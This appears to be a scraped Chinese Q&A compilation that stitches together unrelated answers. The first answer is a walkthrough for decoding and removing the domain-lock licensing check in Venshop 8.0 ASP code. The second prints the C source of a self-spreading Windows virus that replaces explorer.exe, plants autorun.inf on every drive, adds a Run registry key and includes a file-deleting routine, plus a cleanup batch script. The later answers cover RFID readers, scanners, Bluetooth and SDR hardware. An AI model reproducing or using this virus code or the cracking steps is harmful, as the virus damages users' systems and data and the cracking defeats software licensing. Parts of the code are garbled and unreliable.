uhf源码

A. 谁帮我解ASP源码

Venshop 8.0中config.asp文件对域名进行了绑定：

=======================================================================
加密文档如下:第一段：

<%#@~^NgkAAA==@#@&/nDPM/G{/.\D mM+COW4NnmD`Jm[GN(RM+^W.[k+OJ*@#@&k;sxr/+sn1Y~e,WMWh,\x/4Wam/H/O+sJ@#@&M/GcGwxPk5s~1W xSFSq@#@&A+(xDkGcES+4Eb@#@&4WsnalL'M/GvJ4G:wCoJb@#@&/kDnxm:+{.dGvJkkO+UCs+E#@#@&/bYn;MV']n$En/D U+.7+M.lMkm8V/cJU2]#AI{g)HAJ#L]n;!+kY ?n.7+..m.km4snk`Jj/"qKK|HzH3r#@#@&:mk^xDkGcJslrsr#@#@&WlX'Dk{cJ6lXJb@#@&r1wxDk{`rk^2r#@#@&OVxDk{vJOVr#@#@&:kU'M/{`r:dUr#@#@&z:mNNMx./F`rXhl[[MJb@#@&^W9+x.kG`E^KNnJ*@#@&VGTW{D/F`rsWTWE#@#@&C4ko4O'M/GvE4+bo4YE#@#@&mhrND4'M/{crhk[O4Jb@#@&4kL4YD'DkGvEtkLtDYEb@#@&hb[Y4Y'Md{`rhbNOtOE*@#@&w4GYKtx.kG`E24WOW4E*@#@&^WK3Y{Dk{`rVGW0YEb@#@&VKG3alox./F`rVGWV2monJ*@#@&^WGV4lxLxM/{`rsKWV4l oJ*@#@&OW o%'M/{crYW LLr#@#@&dGDD4{DdGcEkW.Yrb@#@&2mjD\n.{DdGvEslr^{k+\Drb@#@&2m?D-nMj/.'M/GvEhlbV|Ed+.E*@#@&2|j+M\n.hl/dxM/{`rhmks|wm//r#@#@&2|?nx9HCUtlk^xDkG`rhCk^{k+UNhCbVE#@#@&2|?nU9HlUHm:n'MdF`EslbV{k+ [xm:nJ*@#@&3|?+ [HmxKH2n'M/F`E:Cr^{OXanJ*@#@&hmkVm.od'MdF`EslbV{M+TdJ*@#@&:mksmM+o1xDkG`rhCk^{M+LmEb@#@&hlbs{KD[nM/'.dF`E:mr^{GMND/r#@#@&:mks{KD[nMm'MdGvJ:mrs{KD9+.mEb@#@&d+MxDkGcEk+DEb@#@&d+MmD'.kGvJ/D|OJ*@#@&Wbm5xM/GvEWbm;rb@#@&Kk1;mxx.kGcJKrm${UE*@#@&.nT'./FcrDnTJ*@#@&TEdYKD[+M'.dF`JT;+kYWM[nDr#@#@&^WhhxO/4Gh{Dd{vJmGhs+UYk4KhE*@#@&4lKLbC/4WA'M/{cr4lK%km/tKAE#@#@&mNhkUd4WA'MdGvJC[skxd4KhE#@#@&4EGktKh'M/FcJ4EG/4WAE*@#@&7nxktWamd3bx{DdGcEk3rxrb@#@&0dVbx'.dF`E/0r Jb@#@&b0Pb/ ;V^`-+ /4Ga{/0rx*PY4nUP7+ /4W2mk3rx{EN0C;^YJ@#@&b0~kkU!Vsv0k3k #,Otx~0k3rU{JNWl!VYr@#@&YNk Nn6x.kGcJD%k Nnar#@#@&OLrl{.kGcrYLkmJ*@#@&TEU'M/{croE E#@#@&\(;O'M/F`E\8;DJb@#@&-hKD[xM/GcE7hGD9E*@#@&M/FRm^Wkn@#@&/nY,Dd{{xWD4k o@#@&dnY,Dk'd+.-D mMnlD+G8N+mOcrl[W98cDn1WMN/Yrb@#@&/5V{Jdn^+mD~YKwP8~MP6DK:~\nUktGw|-+ l[E@#@&Dd Kwnx,d$VS1W x~8~8@#@&D{r/{DdcrY{bdJ*@#@&bd"EK'M/cJrd.EGJ*@#@&b/zG!'DdcrkdXK;r#@#@&EMVy!W{./vJ;D^y;Gr#@#@&;D^XW!x./vJ!DsXG;r#@#@&arm.EGxM/`E2bm"EKE*@#@&ak1XW!'Md`rwrmHW;E*@#@&m[{b:o8x./vJmNmkhL8Jb@#@&CN|khLy'Ddcrl[{bhT E*@#@&lN|ksL&{Dd`rl[mb:o2E#@#@&l9mr:Tc{Dd`EC9{r:T*J*@#@&C9{E.s8'./vEmNm!D^FJ*@#@&CN|E.Vy'.dvJl9mEMV rb@#@&mN|E.VfxM/cJm[{!Dsfr#@#@&C9{;D^*{DdvJmN{!D^*J*@#@&DkR^sK/+@#@&/YPMdxxKY4kUo@#@&wEUmDrW P-n mW[nv\nxk4Kwb@#@&6WD,k{qPDW~Vxc-x/4Gw*@#@&bW~:bNv\nxd4KwSkBq#@!@*-AKDN~O4+U@#@&-xxm/1`:bNv-+ /4Wa~rS8## -4!Y@#@&rWP7+ @*q ~Dtnx@#@&\xx-xO1X@#@&nVknb0~7+ @!&yPD4+ @#@&\xx-x_OX@#@&+x9~r0@#@&7+Ulx-xC[14Dv\nU*@#@&nsk+@#@&7n lx7+ l[1tMcF2#@#@&x[~b0@#@&U+XY@#@&-nx1W9+x\nUm@#@&2 [PwEU^DkWUK8UCAA==^#~@%>

破解出来为：

<%
set rs7=server.createobject("adodb.recordset")
sql="select * from venshop_system"
rs7.open sql,conn,1,1
web=rs7("web")
homepage=rs7("homepage")
sitename=rs7("sitename")
siteurl=Request.ServerVariables("SERVER_NAME")&Request.ServerVariables("SCRIPT_NAME")
mail=rs7("mail")
fax=rs7("fax")
icp=rs7("icp")
tel=rs7("tel")
msn=rs7("msn")
ymaddr=rs7("ymaddr")
code=rs7("code")
logo=rs7("logo")
aheight=rs7("height")
awidth=rs7("width")
heightt=rs7("heightt")
widtht=rs7("widtht")
photoh=rs7("photoh")
lookt=rs7("lookt")
lookpage=rs7("lookpage")
lookhang=rs7("lookhang")
tongj=rs7("tongj")
sortb=rs7("sort")
E_Server=rs7("mail_sever")
E_ServerUser=rs7("mail_user")
E_ServerPass=rs7("mail_pass")
E_SendManMail=rs7("mail_sendmail")
E_SendManName=rs7("mail_sendname")
E_SendManType=rs7("mail_type")
mail_regs=rs7("mail_regs")
mail_regc=rs7("mail_regc")
mail_orders=rs7("mail_orders")
mail_orderc=rs7("mail_orderc")
ser=rs7("ser")
ser_t=rs7("ser_t")
oicq=rs7("oicq")
oicq_n=rs7("oicq_n")
reg=rs7("reg")
guestorder=rs7("guestorder")
commentshow=rs7("commentshow")
baojiashow=rs7("baojiashow")
adminshow=rs7("adminshow")
huoshow=rs7("huoshow")
venshop_skin=rs7("skin")
fskin=rs7("skin")
if isnull(venshop_skin) then venshop_skin="default"
if isnull(fskin) then fskin="default"
tjindex=rs7("tjindex")
tejia=rs7("tejia")
gun=rs7("gun")
vbut=rs7("vbut")
vword=rs7("vword")
rs7.close
set rs7=nothing
set rs=server.createobject("adodb.recordset")
sql="select top 1 * from venshop_venad"
rs.open sql,conn,1,1
t_is=rs("t_is")
iszuo=rs("iszuo")
isyou=rs("isyou")
urlzuo=rs("urlzuo")
urlyou=rs("urlyou")
piczuo=rs("piczuo")
picyou=rs("picyou")
ad_img1=rs("ad_img1")
ad_img2=rs("ad_img2")
ad_img3=rs("ad_img3")
ad_img4=rs("ad_img4")
ad_url1=rs("ad_url1")
ad_url2=rs("ad_url2")
ad_url3=rs("ad_url3")
ad_url4=rs("ad_url4")
rs.close
set rs=nothing

Function vencode(venshop)
for i=1 to len(venshop)
if mid(venshop,i,1)<>vword then
ven=asc(mid(venshop,i,1))-vbut
if ven>126 then
ven=ven-95
elseif ven<32 then
ven=ven+95
end if
vena=vena&chr(ven)
else
vena=vena&chr(13)
end if
next
vencode=vena
End Function %>

最后一段：
Function vencode(venshop)
for i=1 to len(venshop)
if mid(venshop,i,1)<>vword then
ven=asc(mid(venshop,i,1))-vbut
if ven>126 then
ven=ven-95
elseif ven<32 then
ven=ven+95
end if
vena=vena&chr(ven)
else
vena=vena&chr(13)
end if
next
vencode=vena
End Function %> 用来对第二段加密文档进行解密

第二段加密文档如下:
<%
venshopcom="iptu>mdbtf)sfrvftu/tfswfswbsjbcmft)#IUUQ`IPTU#**|jg!jotus)iptu-#csboemjgfnbmm#*=>1!boe!jotus)iptu-#2:3/279#*=>1!boe!iptu=?#mpdbmiptu#!boe!!iptu=?#238/1/1/2#!uifo|sftqpotf/sfejsf!#iuuq;00xxx/wfotipq/dpn0#|sftqpotf/foe|foe!jg|Gz`Vsm>Sfrvftu/TfswfsWbsjbcmft)#RVFSZ`TUSJOH#*|Gz`b>tqmju)Gz`Vsm-#'#*|sfejn!Gz`Dt)vcpvoe)Gz`b**|Po!Fssps!Sftvnf!Ofyu|gps!Gz`y>1!up!vcpvoe)Gz`b*|Gz`Dt)Gz`y*!>!mfgu)Gz`b)Gz`y*-jotus)Gz`b)Gz`y*-#>#*.2*|Ofyu|Gps!Gz`y>1!up!vcpvoe)Gz`Dt*|Jg!Gz`Dt)Gz`y*=?##!Uifo|Jg!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#(#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#boe#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#tfmf#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#vqebuf#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#dis#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#efmfuf&31gspn#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#<#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#jotfsu#*=?1!ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#nje#*=?1!Ps!Jotus)MDbtf)Sfrvftu)Gz`Dt)Gz`y***-#nbtufs/#*=?1!Uifo|sftqpotf/Xsjuf!#=tdsjqu!mbohvbhf>(kbwbtdsjqu(?bmfsu)(Fssps""(*<ijtupsz/hp).2*<=0tdsjqu?#|Sftqpotf/Foe|Foe!Jg|Foe!Jg|Ofyu|Gvojpo!EfmTus)Tus*|Jg!JtOvmm)Tus*!Ps!JtFnquz)Tus*!Uifo|Tus>!##|Foe!Jg|EfmTus>Sfqmbdf)Tus-#<#-##*|EfmTus>Sfqmbdf)EfmTus-#(#-##*|EfmTus>Sfqmbdf)EfmTus-#'#-##*|EfmTus>Sfqmbdf)EfmTus-#!#-##*|EfmTus>Sfqmbdf)EfmTus-#?#-##*|EfmTus>Sfqmbdf)EfmTus-#&31#-##*|EfmTus>Sfqmbdf)EfmTus-#.#-##*|EfmTus>Sfqmbdf)EfmTus-#>#-##*|EfmTus>Sfqmbdf)EfmTus-#=#-##*|EfmTus>Sfqmbdf)EfmTus-#?#-##*|EfmTus>Sfqmbdf)EfmTus-#&#-##*|Foe!Gvojpo|Gvojpo!dilmphjo)vtfs`obnf*|tfu!st>tfswfs/dsfbufpckf)#bepec/sfdpsetfu#*|trm>#tfmf!+!gspn!wfotipq`vtfs!xifsf!vtfsobnf>(#'vtfs`obnf'#(#|st/pqfo!trm-dpoo-2-2|jg!st/fpg!uifo|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`obnf#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`qbtt#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`dmbtt#*>##|sftqpotf/sfejsf!#mphjo/btq#|sftqpotf/foe|fmtf|vtfs`qbtt>st)#vtfsqbtt#*|foe!jg|st/dmptf|tfu!st>opuijoh|jg!usjn)Sfrvftu/Dppljft)#wfotipq#*)#vtfs`qbtt#**=?usjn)vtfs`qbtt*!uifo|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`obnf#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`qbtt#*>##|Sftqpotf/Dppljft)#wfotipq#*)#vtfs`dmbtt#*>##|sftqpotf/sfejsf!#mphjo/btq#|sftqpotf/foe|foe!jg|Foe!Gvojpo|Gvojpo!Tipxgmbti)jnh-xu-ih-pobnf*|sftqpotf/xsjuf!#=pckf!dmbttje>##dmtje;E38DEC7F.BF7E.22DG.:7C9.555664651111##!obnf>#'pobnf'#!dpefcbtf>##iuuq;00epxompbe/nbdspnfejb//dbc$wfstjpo>7-1-51-1##!cpsefs>##1##!xjeui>#'xu'#!ifjhiu>#'ih'#?#|sftqpotf/xsjuf!#=qbsbn!obnf>##npwjf##!wbmvf>#'jnh'#?#|sftqpotf/xsjuf!#=qbsbn!obnf>##rvbmjuz##!wbmvf>##Ijhi##?#|sftqpotf/xsjuf!#=fncfe!tsd>#'jnh'#!qmvhjotqbhf>##iuuq;00xxx/nbdspnfejb/dpn0hp0hfugmbtiqmbzfs##!uzqf>##bqqmjdbujpo0y.tipdlxbwf.gmbti##!obnf>#'pobnf'#!rvbmjuz>##Ijhi##!xjeui>#'xu'#!ifjhiu>#'ih'#?=0pckf?#|Foe!Gvojpo|Gvojpo!GpsnbuOvn)Ovn*|GpsnbuOvn>GpsnbuOvncfs)Ovn-3-.2*|Foe!Gvojpo"
execute(vencode(venshopcom))
%>
8.0以下版本将最后一句execcute(vencode(venshopcom))改为response.write(vencode(venshopcom))
起作用的是
host=lcase(request.servervariables("HTTP_HOST"))
if instr(host,"brandlifemall")<=0 and instr(host,"192.168")<=0 and host<>"localhost" and host<>"127.0.0.1" then
response.redirect "http://www.venshop.com/"
8.0版在加密文档中输出了一个alart,用上面的方法输出被alart中断没法看到完整的解密文档.把response.write改为文件输出,从本地文件中获得解密后的文档,如下:
<%
host=lcase(request.servervariables("HTTP_HOST"))
if instr(host,"brandlifemall")<=0 and instr(host,"192.168")<=0 and host<>"localhost" and host<>"127.0.0.1" then
response.redirect "http://www.venshop.com/"
response.end
end if
Fy_Url=Request.ServerVariables("QUERY_STRING")
Fy_a=split(Fy_Url,"&")
redim Fy_Cs(ubound(Fy_a))
On Error Resume Next
for Fy_x=0 to ubound(Fy_a)
Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),"=")-1)
Next
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 Or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End
End If
End If
Next
Function DelStr(Str)
If IsNull(Str) Or IsEmpty(Str) Then
Str= ""
End If
DelStr=Replace(Str,";","")
DelStr=Replace(DelStr,"'","")
DelStr=Replace(DelStr,"&","")
DelStr=Replace(DelStr," ","")
DelStr=Replace(DelStr,">","")
DelStr=Replace(DelStr,"%20","")
DelStr=Replace(DelStr,"-","")
DelStr=Replace(DelStr,"=","")
DelStr=Replace(DelStr,"<","")
DelStr=Replace(DelStr,">","")
DelStr=Replace(DelStr,"%","")
End Function

Function chklogin(user_name)
set rs=server.createobject("adodb.recordset")
sql="select * from venshop_user where username='"&user_name&"'"
rs.open sql,conn,1,1
if rs.eof then
Response.Cookies("venshop")("user_name")=""
Response.Cookies("venshop")("user_pass")=""
Response.Cookies("venshop")("user_class")=""
response.redirect "login.asp"
response.end
else user_pass=rs("userpass")
end if
rs.close

set rs=nothing
if trim(Request.Cookies("venshop")("user_pass"))<>trim(user_pass) then
Response.Cookies("venshop")("user_name")=""
Response.Cookies("venshop")("user_pass")=""
Response.Cookies("venshop")("user_class")=""
response.redirect "login.asp"
response.end
end if
End Function

Function Showflash(img,wt,hg,oname)
response.write ""
response.write ""
response.write ""
response.write ""
End Function

Function FormatNum(Num)
FormatNum=FormatNumber(Num,2,-1)
End Function
%>
将brandlifemall改为自己的域名,则破解成功.
另外,根据vencode函数逆推,可以得出加密函数,将明码还原到加密状态.

ps:8.0版本中vencode函数有两个vword和vbut变量是从数据库中提取的,值可能是出厂前随即设定,也有可能是固定的,我的数据库里vword="|" , vbut="1"

B. 关于计算机病毒源码

即使是小病毒也不是太好编的

比如用C语言做的小病毒……
功能：
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体：
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件，使其不需要修改注册表做到启动时在

explorer.exe前启动
4.修改注册表，在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项（此操作不使用windowsAPI,防止用户对病毒体的发现，并实现并行执行）
5.生成的autorun.inf改变磁盘的打开方式，使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱，而是以运行病毒的方式取而代之。
6.连锁能力，将病毒体相连，实现相连复制更新
7.使用进程不断调用进程，使得在任务管理里无法结束病毒进程
8.不断搜索磁盘，只要发现未感染病毒的一律感染，病毒删除后1秒内再建
9.生成垃圾文件（DESTORY_感染_任意数字）5个于C盘下
10.附带删除文件函数（为防止危害，本函数默认不执行）

本病毒到目前为止任何杀毒软件都无法将其查杀（07年的）
本病毒单机默认使用对机器无害（破坏代码已屏蔽）
提供病毒卸载程序（保存为X.BAT，双击运行即可卸载）：

@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\msmouse.dll
del c:\windows\system32\cmdsys.sys
del c:\windows\system32\mstsc32.exe
del c:\svchost.com
del c:\autorun.inf
del d:\svchost.com
del d:\autorun.inf
del e:\svchost.com
del e:\autorun.inf
del f:\svchost.com
del f:\autorun.inf
del g:\svchost.com
del g:\autorun.inf
del h:\svchost.com
del h:\autorun.inf
c:\windows\system\explorer.exe c:\windows\explorer.exe
c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\explorer.exe
echo FINISH!
echo 如果本次清除后仍残留有病毒，请再次运行本程序
pause

--------------------------------------------------------------------
核心代码：（全部代码请从附件中下载，请用DEV-CPP运行其中的工程文件，编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用，请安心运行实验，恶意代码已屏蔽）

/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/

/* SVCHOST.C */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include<stdio.h> /*标准输入输出*/
#include<string.h> /*字符串操作*/
#include<stdlib.h> /*其它函数*/
#include<process.h> /*进程控制*/
#include<dir.h> /*目录函数*/

#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================================*/
/*
文件AUTORUN.INF内容：
1.自动运行SVCHOST.com
2.覆盖默认打开命令，使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令，使病毒体作为新的命令方式
*/
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(&O)

\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(&X)

\nshell\\explore\\Command=\"SVCHOST.com /s\""};
/*=====================================================================*/
/*
添加注册表项：
1.自动运行生成病毒体C:\windows\wjview32.com
*/
char *regadd={"REGEDIT4\n\n

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32

\"=\"C:\\\\windows\\\\wjview32.com /s\""};
/*=====================================================================*/
/*
函数：复制文件
复制源：infile
目的地：outfile
成功返回0，失败返回1
*/
int (char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen

(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
}
else return 1;
}
/*=====================================================================*/
/*
函数：通过explorer自动运行
成功返回0，失败返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
{
fclose(input);
remove("c:\\windows\\$temp$");
remove("c:\\windows\\system32\\dllcache\\$temp$");
return 1;
}
("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");
rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32

\\dllcache\\$temp$");
if(("SVCHOST.com","c:\\windows\\explorer.exe")==0 &&

("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
return 0;
else
return 2;
}
/*=====================================================================*/
/*
函数：添加注册表项
成功返回0，失败返回1
*/
int add_reg()
{
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd);
fclose(output);
spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);
}
}
/*=====================================================================*/
/*
函数：复制病毒 + Autorun.inf自动运行
*/
void _virus()
{
int i,k;
FILE *input,*output;
char *files_svchost[SVCHOST_NUM]=

{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\syste

m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;k<SVCHOST_NUM;k++)
{
(files_svchost[i],files_svchost[k]);
}
i=SVCHOST_NUM;
}
}
for(i=0;i<SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;k<24;k++)
{
(files_svchost[i],temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun);
fclose(output);
}
temp[0][0]++;
temp[1][0]++;
}
i=SVCHOST_NUM;
}
}
}
/*=====================================================================*/
/*
函数：制造垃圾文件
*/
void make_rubbish()
{
int i;
FILE *output;
srand(0);
for(i=0;i<RUBBISH_NUM;i++)
{
int n;
char s[30];
n=rand();
sprintf(s,"C:\\DESTORY_感染_%d",n);
if((output=fopen(s,"w"))!=NULL)
{
fprintf(output,"%ld%s",n*n,s);
fclose(output);
}
}
}
/*=====================================================================*/
/*
函数：删除文件
*/
void remove_files()
{
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i<3;i++)
{
if(_findfirst(remove_files[i],&ffblk)==-1) continue;
while(!done)
{
remove(ffblk.name);
_findnext(done,&ffblk);
}
_findclose(done);
}
}
/*=====================================================================*/
/*
主程序
使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面，于后台执行
*/
int main(int argc,char **argv)
{
int contral=0;
if(argc>1)
if(strcmp(argv[1],"/s")==0)
goto next1;
autorun_explorer();
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
next1:
add_reg();
_virus();
make_rubbish();
/* remove_files(); */
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
return 0;
}

其他的恐怕只能告诉你网址了
比如黑客联盟的http://www.chinahacker.com/

参考资料： http://hi..com/wubeip111/blog/item/3f63e20ad515cd1d95ca6bd2.html

C. 设计UHF RFID的读写器模块，用R2000芯片，大概需要多长时间，价格是多少

如果买源码自己开发，成本很高的了，要20万以上，开发周期长，要半年以上，国内这样开发的不超过五家，其他的一般都是拿调用库，这个基本就成本低周期短。

D. 求 AS3992 Roger 超高频读写器的 上位机 带源码示例

你可以到“中远嵌入式”购买。Eleckits。他们有一款1:1奥地利微电子Roger版本的As3992的超高频无源读写模块。原厂资源资料很多。作为学习和开发用很方便。价格是原厂价格的三分之一都不到。性价比很高。

E. Accelerated Reader Program是什么意思

Accelerated Reader Program
加速的读写程序
双语例句
1
UHF RFID Reader Program code integrity, and can be used directly.
UHFRFID读取器程序的源代码完整，并可以直接使用。

2
Then this paper give a system design of reader program, verify and improve themethod in the project.
然后提出设计读写器的系统方案和实现方法，并在工程中进行验证和改善。

F. 连接平板电脑的扫描枪是什么型号

手持式扫描枪和平台式扫描枪的中间产品（这几年有新的出现，因为是内置供电且体积小被称为笔记本扫描枪）这种产品绝大多数采用CIS技术，光学分辨率为300dpi，有彩色和灰度两种，彩色型号一般为24位彩色。也有及少数小滚筒式扫描枪采用CCD技术，扫描效果明显优于CIS技术的产品，但由于结构限制，体积一般明显大于CIS技术的产品。小滚筒式的设计是将扫描枪的镜头固定，而移动要扫描的物件通过镜头来扫描，运作时就象打印机那样，要扫描的物件必须穿过机器再送出，因此，被扫描的物体不可以太厚。这种扫描枪最大的好处就是，体积很小，但是由于使用起来有多种局限，例如只能扫描薄薄的纸张，范围还不能超过扫描枪的大小。
平台式扫描枪
又称平板式扫描枪、台式扫描枪，目前在市面上大部分的扫描枪都属于平板式扫描枪，是现在的主流。这类扫描枪光学分辨率在300dpi-8000dpi之间，色彩位数从24位到48位，扫描幅面一般为A4或者A3。平板式的好处在于像使用复印机一样，只要把扫描枪的上盖打开，不管是书本、报纸、杂志、照片底片都可以放上去扫描，相当方便，而且扫描出的效果也是所有常见类型扫描枪中最好的。
其它的还有大幅面扫描用的大幅面扫描枪、笔式扫描枪、条码扫描枪、底片扫描枪（注意不是平板扫描枪加透扫，效果要好的多，价格当然也贵）、实物扫描枪（不是有实物扫描能力的平板扫描枪，有点类似于数码相机），还有主要用于业印刷排版领域的滚筒式扫描枪等很多。
扫描枪的种类及其用途的区别，使得扫描枪价格也有很大的差距，数百元到数千上万元的扫描枪也因为外观及其使用环境的因素而不同。选择一款合适的扫描枪会让工作流程更为简单、更为便捷。

G. bluetooth是什么意思

bluetooth意思是：蓝牙。

1、蓝牙是一种支持设备短距离通信（一般10m内）的无线电技术。

2、能在包括移动电话、PDA、无线耳机、笔记本电脑、相关外设等之间进行无线信息交换。

3、利用“蓝牙”技术，能够有效地简化移动通信终端设备之间的通信，也能够简化设备与因特网Internet之间的通信，从而数据传输变得更加迅速高效。

4、蓝牙采用分散式网络结构以及快跳频和短包技术，支持点对点及点对多点通信，工作在全球通用的2.4GHz ISM（即工业、科学、医学）频段。其数据速率为1Mbps。

5、采用时分双工传输方案实现全双工传输。

H. 手机连接wifi后怎么隐藏图标

手机连接wifi后隐藏图标的方法：
1、进入手机设置-WLAN项，把WIFI功能关闭，手机上面的WIFI图标自然消失。
2、若要使用WIFI又要隐藏图标，将手机root，使用Xposed框架对应模块功能，将WIFI图标隐藏。
3、不建议采用2的方法，这样用户无法知道当然是否使用了WIFI走流量，任意在上网过程中意外产生大量费用。

I. 基于Cortex-M3最小系统组成、各模块的的作用

2021年，适用于任何预算的15种最佳软件定义无线电（SDR） 对于尝试挑选软件定义无线电SDR设备时，各种各样的产品可能会让无数火腿小伙伴们不知所措。 我们在网上搜索了15个软件定义无线电设备，让您无需头疼！ 那么2021年最好的SDR接收器或收发器是什么呢？ 答案是……很复杂！ 选择SDR电台时，有许多因素在起作用。 频率范围，发送/接收能力，复杂性，可用的固件和开源项目，当然还有成本！ 以下列出了出色的SDR无线电设备，涵盖了这个多样化的频谱，我们希望对软件定义无线电感兴趣的任何人都能找到适合他们的东西。

无需再拖延，以下是我们在2021年发布的15款软件定义无线电清单！
1. HackRF One软件定义无线电（SDR），ANT500和SMA天线适配器套件
HackRF One是我们列表中功能最强大且受支持最多的SDR之一，这就是为什么我们首先列出它。HackRF One软件定义的无线电能够发送和接收（Tx / Rx）1MHz至6GHz的频率。

NooElec HackRF One软件定义无线电（SDR），ANT500和SMA天线适配器套件
尽管HackRF One SDR既可以发送也可以接收，但它只是半双工的，这意味着它可以发送或接收，但不能同时发送和接收。该捆绑包包括启动和运行SDR所需的一切：适配器，可将各种天线连接到HackRF One，包括F连接器，N连接器，BNC和PAL天线。以下是来自供应商的其他信息，描述了HackRF One SDR无线电。
Great Scott Gadgets的HackRF One是一款软件定义的无线电外围设备，能够发送或接收1 MHz至6 GHz的无线电信号。HackRF One旨在支持现代和下一代无线电技术的测试和开发，它是一个开放源代码硬件平台，可用作USB外设或编程用于独立操作。
1 MHz至6 GHz的工作频率
半双工收发器
每秒多达2000万个样本
8位正交采样（8位I和8位Q）
与GNU Radio，SDR＃等兼容
可通过软件配置的RX和TX增益以及基带滤波器
软件控制的天线端口电源（3.3 V时为50 mA）
SMA母天线连接器
SMA母时钟输入和输出用于同步
方便的编程按钮
内部扩展针脚
高速USB 2.0
USB供电
开源硬件
2. Nooelec NESDR Smart HF套装

Nooelec NESDR SMArt HF套装
Nooelec NESDR Smart HF捆绑包是一套完整且价格合理的工具包，其中包括接收HF频段所需的一切。
该套件包括Nooelec NESDR无线电，Ham It Up转换器，3种不同的天线，阻抗匹配的不平衡变压器和互连适配器。Nooelec NESDR SMArt SDR与Ham It Up上变频器的结合将使该装置的工作频率范围为100kHz至1.7GHz。
3. RTL-SDR BLOG V3 R820T2 RTL2832U 1PPM TCXO HF校准Tee SMA软件定义的无线电与偶极天线套件
如果说HackRF One功能最全，那么RTL-SDR是最实惠的。追随者几乎像邪教一样，有很多论坛和站点可以帮助您快速监听RTL-SDR软件定义的广播。RTL-SDR仅能接收而不能RTL-SDR是基于RTL2832U ADC芯片的软件定义的无线电接收器。它还包含一个R820T2调谐器，一个1PPM TCXO（具有良好的稳定性）。）和一个用于天线端口的SMA连接器。

